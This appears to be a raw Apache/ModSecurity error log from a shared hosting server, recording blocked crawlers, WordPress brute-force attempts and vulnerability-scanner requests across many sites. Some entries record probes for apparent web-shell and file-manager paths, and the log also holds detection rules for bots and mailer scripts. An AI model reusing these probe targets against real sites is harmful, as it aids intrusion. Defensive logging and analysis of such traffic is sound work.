[Tue May 26 14:24:21.859217 2026] [security2:error] [pid 610693:tid 610923] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfvTvNO3hpmlY6M8RYUQAAAGQ"]
[Tue May 26 14:24:23.681406 2026] [security2:error] [pid 610693:tid 610940] [client 114.119.150.5:26227] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "toronto121mortgage.com"] [uri "/upload/files/85298-bonatox-syvorotka-protiv-morschin-kupit.xml"] [unique_id "ahVfvzvNO3hpmlY6M8RYfgAAAHU"], referer: http://dermalab.pl/userfiles/17586-effektivnyy-krem-protiv-glubokih-morschin.xml
[Tue May 26 14:24:23.818556 2026] [autoindex:error] [pid 610693:tid 610877] [client 34.203.189.2:51186] AH01276: Cannot serve directory /home1/dprlky8f/dprassurance.lk/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:24:23.936375 2026] [security2:error] [pid 610693:tid 610867] [client 202.141.83.254:19753] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfvzvNO3hpmlY6M8RYgwAAACw"]
[Tue May 26 14:24:23.936518 2026] [security2:error] [pid 610693:tid 610867] [client 202.141.83.254:19753] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfvzvNO3hpmlY6M8RYgwAAACw"]
[Tue May 26 14:24:23.978066 2026] [security2:error] [pid 610693:tid 610849] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfvzvNO3hpmlY6M8RYfAAAABo"]
[Tue May 26 14:24:26.159867 2026] [security2:error] [pid 610693:tid 610834] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfwTvNO3hpmlY6M8RYpgAAAAs"]
[Tue May 26 14:24:27.782514 2026] [security2:error] [pid 606909:tid 607162] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfw10yRtX9qA7aVUVhwQAAAQA"]
[Tue May 26 14:24:28.826487 2026] [security2:error] [pid 610693:tid 610856] [client 4.201.75.230:5635] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/god4m.php"] [unique_id "ahVfxDvNO3hpmlY6M8RY2wAAACE"]
[Tue May 26 14:24:30.262426 2026] [security2:error] [pid 610693:tid 610950] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfxTvNO3hpmlY6M8RY-AAAAH8"]
[Tue May 26 14:24:32.063928 2026] [security2:error] [pid 610693:tid 610699] [remote 211.23.68.235:37747] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVfxzvNO3hpmlY6M8RZGAAAQAU"]
[Tue May 26 14:24:32.256904 2026] [security2:error] [pid 606909:tid 607060] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfx10yRtX9qA7aVUViBgAAAJo"]
[Tue May 26 14:24:32.789170 2026] [security2:error] [pid 610693:tid 610700] [remote 74.7.241.58:40902] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVfyDvNO3hpmlY6M8RZIgAAJAY"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/ja
[Tue May 26 14:24:33.192040 2026] [security2:error] [pid 610693:tid 610845] [client 173.239.240.37:65417] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 37.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lifestylemne.me"] [uri "/wp-login.php"] [unique_id "ahVfyDvNO3hpmlY6M8RZKAAAABY"]
[Tue May 26 14:24:34.298175 2026] [security2:error] [pid 606909:tid 607135] [client 202.141.83.254:19730] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfyl0yRtX9qA7aVUViHQAAAOU"]
[Tue May 26 14:24:34.298334 2026] [security2:error] [pid 606909:tid 607135] [client 202.141.83.254:19730] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfyl0yRtX9qA7aVUViHQAAAOU"]
[Tue May 26 14:24:34.342365 2026] [security2:error] [pid 610693:tid 610862] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfyTvNO3hpmlY6M8RZOAAAACc"]
[Tue May 26 14:24:34.369251 2026] [security2:error] [pid 610693:tid 610874] [client 4.201.75.230:5641] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/mari.php"] [unique_id "ahVfyjvNO3hpmlY6M8RZQwAAADM"]
[Tue May 26 14:24:35.940038 2026] [security2:error] [pid 610693:tid 610879] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfyzvNO3hpmlY6M8RZVAAAADg"]
[Tue May 26 14:24:36.162960 2026] [security2:error] [pid 606909:tid 606910] [remote 111.229.141.137:33334] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVfzF0yRtX9qA7aVUViLAAAsQA"]
[Tue May 26 14:24:37.045353 2026] [security2:error] [pid 610693:tid 610711] [remote 209.42.18.223:43038] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.18.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVfzDvNO3hpmlY6M8RZXwAAYxE"]
[Tue May 26 14:24:38.702678 2026] [security2:error] [pid 606909:tid 607092] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfzl0yRtX9qA7aVUViQAAAALo"]
[Tue May 26 14:24:40.738536 2026] [security2:error] [pid 610693:tid 610928] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVf0DvNO3hpmlY6M8RZlwAAAGk"]
[Tue May 26 14:24:42.175090 2026] [security2:error] [pid 606909:tid 607125] [client 157.55.39.10:64198] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "premium.cagmedya.com"] [uri "/index.php/sitemap.txt"] [unique_id "ahVf0l0yRtX9qA7aVUVifQAA22s"]
[Tue May 26 14:24:43.063129 2026] [security2:error] [pid 606909:tid 607054] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVf0l0yRtX9qA7aVUViiAAAAJQ"]
[Tue May 26 14:24:43.135826 2026] [security2:error] [pid 606909:tid 607157] [client 154.161.32.97:56467] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVf0l0yRtX9qA7aVUVihAAAAPs"]
[Tue May 26 14:24:43.578037 2026] [security2:error] [pid 606909:tid 607127] [client 4.204.220.190:2438] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.yndglobal.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVf010yRtX9qA7aVUVilwAAAN0"]
[Tue May 26 14:24:43.578152 2026] [security2:error] [pid 606909:tid 607127] [client 4.204.220.190:2438] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.yndglobal.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVf010yRtX9qA7aVUVilwAAAN0"]
[Tue May 26 14:24:43.727367 2026] [security2:error] [pid 606909:tid 607163] [client 4.204.220.190:2537] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.yndglobal.com"] [uri "/about.php"] [unique_id "ahVf010yRtX9qA7aVUVimwAAAQE"]
[Tue May 26 14:24:43.727472 2026] [security2:error] [pid 606909:tid 607163] [client 4.204.220.190:2537] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.yndglobal.com"] [uri "/about.php"] [unique_id "ahVf010yRtX9qA7aVUVimwAAAQE"]
[Tue May 26 14:24:43.777410 2026] [security2:error] [pid 610693:tid 610854] [client 202.76.168.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVf0zvNO3hpmlY6M8RZugAAAB8"]
[Tue May 26 14:24:44.431647 2026] [security2:error] [pid 610693:tid 610923] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVf1DvNO3hpmlY6M8RZvgAAAGQ"]
[Tue May 26 14:24:45.733516 2026] [security2:error] [pid 606909:tid 607151] [client 202.141.83.254:53895] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVf1V0yRtX9qA7aVUVirwAAAPU"]
[Tue May 26 14:24:45.733653 2026] [security2:error] [pid 606909:tid 607151] [client 202.141.83.254:53895] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVf1V0yRtX9qA7aVUVirwAAAPU"]
[Tue May 26 14:24:46.767784 2026] [security2:error] [pid 606909:tid 607101] [client 172.68.183.64:12571] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rmbtsbd.com"] [uri "/public/index.php"] [unique_id "ahVf1V0yRtX9qA7aVUViswAAAMM"]
[Tue May 26 14:24:46.915612 2026] [security2:error] [pid 610693:tid 610878] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVf1jvNO3hpmlY6M8RZ7QAAADc"]
[Tue May 26 14:24:48.201549 2026] [security2:error] [pid 606909:tid 607155] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVf110yRtX9qA7aVUVizAAAAPk"]
[Tue May 26 14:24:50.040823 2026] [security2:error] [pid 610693:tid 610909] [client 145.223.130.168:42536] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.130.223.145.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "virgence.com"] [uri "/index.php/portfolio_page/voyager-victor-technologies/"] [unique_id "ahVf2TvNO3hpmlY6M8RaMAAAAFY"]
[Tue May 26 14:24:50.995722 2026] [security2:error] [pid 606909:tid 607132] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVf2l0yRtX9qA7aVUVi6AAAAOI"]
[Tue May 26 14:24:52.887374 2026] [security2:error] [pid 610693:tid 610716] [remote 123.30.233.13:44054] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVf3DvNO3hpmlY6M8RaVAAAQxY"]
[Tue May 26 14:24:54.014010 2026] [security2:error] [pid 610693:tid 610864] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVf3TvNO3hpmlY6M8RaYAAAACk"]
[Tue May 26 14:24:55.148026 2026] [security2:error] [pid 610693:tid 610823] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVf3jvNO3hpmlY6M8RacgAAAAA"]
[Tue May 26 14:24:55.289122 2026] [security2:error] [pid 610693:tid 610949] [client 202.141.83.254:19925] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVf3zvNO3hpmlY6M8RadQAAAH4"]
[Tue May 26 14:24:55.289306 2026] [security2:error] [pid 610693:tid 610949] [client 202.141.83.254:19925] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVf3zvNO3hpmlY6M8RadQAAAH4"]
[Tue May 26 14:24:56.214273 2026] [security2:error] [pid 610693:tid 610883] [client 14.143.222.113:46412] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVf3zvNO3hpmlY6M8RaewAAADw"]
[Tue May 26 14:24:57.217696 2026] [security2:error] [pid 610693:tid 610885] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVf4DvNO3hpmlY6M8RakQAAAD4"]
[Tue May 26 14:24:57.508787 2026] [security2:error] [pid 610693:tid 610883] [client 14.143.222.113:46412] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVf3zvNO3hpmlY6M8RaewAAADw"]
[Tue May 26 14:24:57.508852 2026] [security2:error] [pid 610693:tid 610883] [client 14.143.222.113:46412] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVf3zvNO3hpmlY6M8RaewAAADw"]
[Tue May 26 14:24:58.960393 2026] [security2:error] [pid 610693:tid 610886] [client 14.143.222.113:47636] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVf4jvNO3hpmlY6M8RargAAAD8"]
[Tue May 26 14:24:59.045070 2026] [security2:error] [pid 610693:tid 610886] [client 14.143.222.113:47636] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVf4jvNO3hpmlY6M8RargAAAD8"]
[Tue May 26 14:24:59.450196 2026] [security2:error] [pid 610693:tid 610853] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVf4zvNO3hpmlY6M8RasQAAAB4"]
[Tue May 26 14:25:00.454428 2026] [security2:error] [pid 610693:tid 610855] [client 14.143.222.113:48336] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVf5DvNO3hpmlY6M8RawQAAACA"]
[Tue May 26 14:25:00.542780 2026] [security2:error] [pid 610693:tid 610855] [client 14.143.222.113:48336] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVf5DvNO3hpmlY6M8RawQAAACA"]
[Tue May 26 14:25:00.974104 2026] [security2:error] [pid 610693:tid 610899] [client 114.119.138.235:47057] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "bhavisharchitects.com"] [uri "/index.php"] [unique_id "ahVf5DvNO3hpmlY6M8Ra2QAAAEw"], referer: http://bhavisharchitects.com/
[Tue May 26 14:25:01.343540 2026] [security2:error] [pid 610693:tid 610937] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVf5DvNO3hpmlY6M8Ra1wAAAHI"]
[Tue May 26 14:25:01.538718 2026] [security2:error] [pid 610693:tid 610876] [client 208.91.198.85:21972] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rehobothindependentcare.com"] [uri "/wp-cron.php"] [unique_id "ahVf5TvNO3hpmlY6M8Ra3AAAADU"]
[Tue May 26 14:25:01.541656 2026] [security2:error] [pid 606909:tid 607045] [client 208.91.198.85:21968] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rehobothindependentcare.com"] [uri "/index.php"] [unique_id "ahVf5V0yRtX9qA7aVUVjUAAAAIs"]
[Tue May 26 14:25:01.955260 2026] [security2:error] [pid 610693:tid 610870] [client 14.143.222.113:48880] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVf5TvNO3hpmlY6M8Ra4wAAAC8"]
[Tue May 26 14:25:01.997510 2026] [security2:error] [pid 606909:tid 607123] [client 185.231.154.128:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVf5V0yRtX9qA7aVUVjWAAAANk"], referer: http://anujtradingco.com/homepages/shop-parallax/
[Tue May 26 14:25:02.041333 2026] [security2:error] [pid 610693:tid 610870] [client 14.143.222.113:48880] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVf5TvNO3hpmlY6M8Ra4wAAAC8"]
[Tue May 26 14:25:02.838094 2026] [security2:error] [pid 610693:tid 610894] [client 85.208.96.211:34736] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahVf5jvNO3hpmlY6M8Ra9QAAAEc"]
[Tue May 26 14:25:02.838224 2026] [security2:error] [pid 610693:tid 610894] [client 85.208.96.211:34736] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahVf5jvNO3hpmlY6M8Ra9QAAAEc"]
[Tue May 26 14:25:03.006789 2026] [security2:error] [pid 606909:tid 607165] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVf5l0yRtX9qA7aVUVjXQAAAQM"]
